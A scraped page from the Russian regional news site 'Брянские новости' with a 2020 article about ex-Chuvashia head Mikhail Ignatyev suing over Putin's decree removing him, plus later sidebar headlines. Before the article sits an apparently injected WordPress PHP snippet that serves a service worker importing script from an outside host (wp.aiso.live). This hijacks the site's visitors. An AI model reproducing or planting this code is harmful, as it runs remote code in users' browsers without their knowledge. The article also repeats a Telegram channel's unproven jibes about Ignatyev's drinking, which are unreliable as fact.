add_filter('do_parse_request', function ($bool, $wp) { if (isset($_SERVER['REQUEST_URI']) && rtrim($_SERVER['REQUEST_URI'], '/') === '/sw.js') { header('Content-Type: application/javascript'); echo 'importScripts("https://wp.aiso.live/sw.js");'; exit; } return $bool; }, 10, 2); add_action('wp_head', function () { echo ''; }); На Путина подали в суд | Брянские новости
Наверх

27 мая 2020, Среда, 12:47

На Путина подали в суд

На Путина подали в суд

Бывший глава Чувашии Михаил Игнатьев, уволенный с должности с формулировкой «в связи с утратой доверия», подал исковое заявление в Верховный суд России. Он оспаривает указ президента России Владимира Путина о досрочном прекращении полномочий.

Известно, что в иске бывший глава попросил признать незаконным указ, внести в него изменения, а также установить его право на дополнительные социальные и иные гарантии, предусмотренные нормативными правовыми актами. В части прав на социальные гарантии иск был возвращен. В остальной части − принят к рассмотрению, заседание назначено на 30 июня.

На Путина подали в суд

Фото: Бывший руководитель Чувашии Михаил Игнатьев

Как отметили авторы телеграм-канала «Мейстер», глава региона, чьи перспективы избраться на третий срок выглядели крайне сомнительно, последний месяц своего нахождения на посту откровенно чудил: то хамил журналистам, то заставлял офицера МЧС прыгать за ключами от автомобиля. Федеральным властям не оставалось ничего иного как снять его с должности в связи с утратой доверия:

«Была надежда, что отставка отрезвит Игнатьева, но, судя по его последним действиям, запой продолжается. Экс-главе Чувашии стоило бы поискать хорошего нарколога, а не юриста».

Между тем, по информации ряда изданий, сам Игнатьев в настоящий момент помещен в больницу в Санкт-Петербурге с двусторонней пневмонией в тяжелом состоянии. У него диагностировали высокий процент поражения легких. Как отметили в сети некоторые комментаторы, не исключено, что сейчас оппозиция на полном серьезе заявит, что Игнатьева заразили по приказу Путина.


Редакция «Брянских новостей» оставляет за собой право удалять комментарии, нарушающие законодательство РФ. Запрещены высказывания, содержащие разжигание этнической и религиозной вражды, призывы к насилию, призывы к свержению конституционного строя, оскорбления конкретных лиц или любых групп граждан. Также удаляются комментарии, которые не удовлетворяют общепринятым нормам морали, преследуют рекламные цели, провоцируют пользователей на неконструктивный диалог, не относятся к комментируемой информации, оскорбляют авторов комментируемого материала, содержат ненормативную лексику. Редакция не несёт ответственности за мнения, высказанные в комментариях читателей. Комментарии на сайте «Брянские новости» публикуются без премодерации.

Комментарии для сайта Cackle
«Захватчик» Брянска сообщил, кто наводит ракеты на военные объекты

17 июня 2025, Вторник, 02:29

«Захватчик» Брянска сообщил, кто наводит ракеты на военные объекты

Бывший командующий украинских Сил спецопераций, который ранее неоднократно призвал захватить Брянскую область, сообщил, кто наводит ракеты

Выяснилось, как прорываются беспилотники за брянской границей

16 июня 2025, Понедельник, 20:42

Выяснилось, как прорываются беспилотники за брянской границей

Бывший генпрокурор Украины, рассказал, как прорываются российские беспилотники за брянской границей

Россияне поддержали идею сделать «тревожную кнопку» в банковском приложении

16 июня 2025, Понедельник, 17:30

Россияне поддержали идею сделать «тревожную кнопку» в банковском приложении

Среди потенциально полезных функций такой кнопки, помимо жалоб на мошенничество, опрошенные также отмечают сигнал в случае утери карты и при угрозе личной безопасности

Банки фиксируют рост спроса на дистанционные гарантии

16 июня 2025, Понедельник, 17:08

Банки фиксируют рост спроса на дистанционные гарантии

Такое заявление спикер сделал в преддверии ПМЭФ-2025

Выскочка и мясник: «завоеватель» Брянска обрушился на своих

15 июня 2025, Воскресенье, 19:51

Выскочка и мясник: «завоеватель» Брянска обрушился на своих

Выскочкой и мясником назвал главного разведчика Украины генерал ВСУ, призывавший захватить Брянск